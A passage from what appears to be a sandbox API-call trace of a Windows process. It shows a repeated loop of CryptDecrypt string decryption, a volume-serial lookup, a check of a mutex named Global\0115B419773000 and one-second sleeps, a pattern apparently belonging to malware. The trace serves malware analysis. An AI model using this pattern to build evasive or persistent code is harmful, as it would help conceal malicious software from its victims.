ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0048.799] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0048.800] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0048.800] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0048.800] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0048.800] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0048.800] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71dc0) returned 1 [0048.800] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0048.800] CryptDecrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0048.800] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0048.800] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0048.800] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x314 [0048.800] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x0) returned 0x102 [0048.800] CloseHandle (hObject=0x314) returned 1 [0048.800] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0048.800] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0048.800] Sleep (dwMilliseconds=0x3e8) [0050.049] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0050.049] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71cc0) returned 1 [0050.049] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0050.049] CryptDecrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0050.049] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0050.049] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0050.049] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0050.049] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68238 [0050.049] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71a80) returned 1 [0050.049] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0050.049] CryptDecrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68238, pdwDataLen=0x298f9a8 | out: pbData=0x2a68238, pdwDataLen=0x298f9a8) returned 1 [0050.049] CryptDestroyKey (hKey=0xf71a80) returned 1 [0050.049] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68238 | out: hHeap=0x2a60000) returned 1 [0050.049] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0050.049] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0050.049] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0050.049] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0050.050] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0050.050] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0050.050] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf72040) returned 1 [0050.050] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0050.050] CryptDecrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0050.050] CryptDestroyKey (hKey=0xf72040) returned 1 [0050.050] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0050.050] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x330 [0050.050] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x0) returned 0x102 [0050.050] CloseHandle (hObject=0x330) returned 1 [0050.050] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0050.050] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0050.050] Sleep (dwMilliseconds=0x3e8) [0051.389] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0051.389] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71d40) returned 1 [0051.390] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0051.390] CryptDecrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0051.390] CryptDestroyKey (hKey=0xf71d40) returned 1 [0051.390] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0051.390] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0051.390] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68790 [0051.390] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71dc0) returned 1 [0051.390] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0051.390] CryptDecrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68790, pdwDataLen=0x298f9a8 | out: pbData=0x2a68790, pdwDataLen=0x298f9a8) returned 1 [0051.390] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0051.390] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68790 | out: hHeap=0x2a60000) returned 1 [0051.390] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0051.390] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0051.390] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0051.390] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0051.390] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0051.390] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0051.390] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71b80) returned 1 [0051.390] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0051.390] CryptDecrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0051.390] CryptDestroyKey (hKey=0xf71b80) returned 1 [0051.390] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0051.390] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x328 [0051.390] WaitForSingleObject (hHandle=0x328, dwMilliseconds=0x0) returned 0x102 [0051.390] CloseHandle (hObject=0x328) returned 1 [0051.391] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0051.391] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0051.391] Sleep (dwMilliseconds=0x3e8) [0052.980] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0052.980] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf72140) returned 1 [0052.980] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0052.980] CryptDecrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0052.980] CryptDestroyKey (hKey=0xf72140) returned 1 [0052.980] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0052.980] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0052.980] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68958 [0052.980] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71bc0) returned 1 [0052.980] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0052.980] CryptDecrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68958, pdwDataLen=0x298f9a8 | out: pbData=0x2a68958, pdwDataLen=0x298f9a8) returned 1 [0052.981] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0052.981] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68958 | out: hHeap=0x2a60000) returned 1 [0052.981] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0052.981] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0052.981] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0052.981] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.981] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0052.981] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0052.981] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71f40) returned 1 [0052.981] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0052.981] CryptDecrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0052.981] CryptDestroyKey (hKey=0xf71f40) returned 1 [0052.981] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0052.981] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e4 [0052.981] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0x0) returned 0x102 [0052.981] CloseHandle (hObject=0x2e4) returned 1 [0052.981] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0052.981] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0052.981] Sleep (dwMilliseconds=0x3e8) [0054.575] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0054.576] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf72040) returned 1 [0054.576] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0054.576] CryptDecrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0054.576] CryptDestroyKey (hKey=0xf72040) returned 1 [0054.576] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0054.576] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0054.576] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68070 [0054.576] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71b80) returned 1 [0054.576] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0054.576] CryptDecrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68070, pdwDataLen=0x298f9a8 | out: pbData=0x2a68070, pdwDataLen=0x298f9a8) returned 1 [0054.576] CryptDestroyKey (hKey=0xf71b80) returned 1 [0054.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68070 | out: hHeap=0x2a60000) returned 1 [0054.576] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0054.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0054.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0054.576] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0054.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0054.576] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0054.576] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf72040) returned 1 [0054.576] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0054.576] CryptDecrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0054.576] CryptDestroyKey (hKey=0xf72040) returned 1 [0054.576] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0054.576] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e4 [0054.576] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0x0) returned 0x102 [0054.576] CloseHandle (hObject=0x2e4) returned 1 [0054.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0054.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0054.577] Sleep (dwMilliseconds=0x3e8) [0056.054] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0056.055] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf720c0) returned 1 [0056.055] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0056.055] CryptDecrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0056.055] CryptDestroyKey (hKey=0xf720c0) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0056.055] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0056.055] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68bb8 [0056.055] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71e00) returned 1 [0056.055] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0056.055] CryptDecrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68bb8, pdwDataLen=0x298f9a8 | out: pbData=0x2a68bb8, pdwDataLen=0x298f9a8) returned 1 [0056.055] CryptDestroyKey (hKey=0xf71e00) returned 1 [0056.055] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68bb8 | out: hHeap=0x2a60000) returned 1 [0056.055] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0056.055] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0056.055] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0056.055] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0056.055] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0056.055] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0056.055] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71ac0) returned 1 [0056.055] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0056.055] CryptDecrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0056.056] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0056.056] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0056.056] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x344 [0056.056] WaitForSingleObject (hHandle=0x344, dwMilliseconds=0x0) returned 0x102 [0056.056] CloseHandle (hObject=0x344) returned 1 [0056.056] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0056.056] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0056.056] Sleep (dwMilliseconds=0x3e8) [0057.281] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0057.728] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71ac0) returned 1 [0057.728] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0057.728] CryptDecrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0057.728] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0057.731] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0057.733] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0057.736] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a686f8 [0057.736] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71e00) returned 1 [0057.737] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0057.739] CryptDecrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a686f8, pdwDataLen=0x298f9a8 | out: pbData=0x2a686f8, pdwDataLen=0x298f9a8) returned 1 [0057.742] CryptDestroyKey (hKey=0xf71e00) returned 1 [0057.745] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a686f8 | out: hHeap=0x2a60000) returned 1 [0057.745] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0057.748] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0057.750] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0057.750] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0057.758] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0057.765] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0057.769] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf720c0) returned 1 [0057.769] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0057.769] CryptDecrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0057.769] CryptDestroyKey (hKey=0xf720c0) returned 1 [0057.769] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0057.769] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x328 [0057.769] WaitForSingleObject (hHandle=0x328, dwMilliseconds=0x0) returned 0x102 [0057.769] CloseHandle (hObject=0x328) returned 1 [0057.769] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0057.769] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0057.769] Sleep (dwMilliseconds=0x3e8) [0059.572] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0059.572] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71bc0) returned 1 [0059.572] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0059.572] CryptDecrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0059.572] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0059.572] RtlAllocateHeap (HeapHandle=0x2a60000, 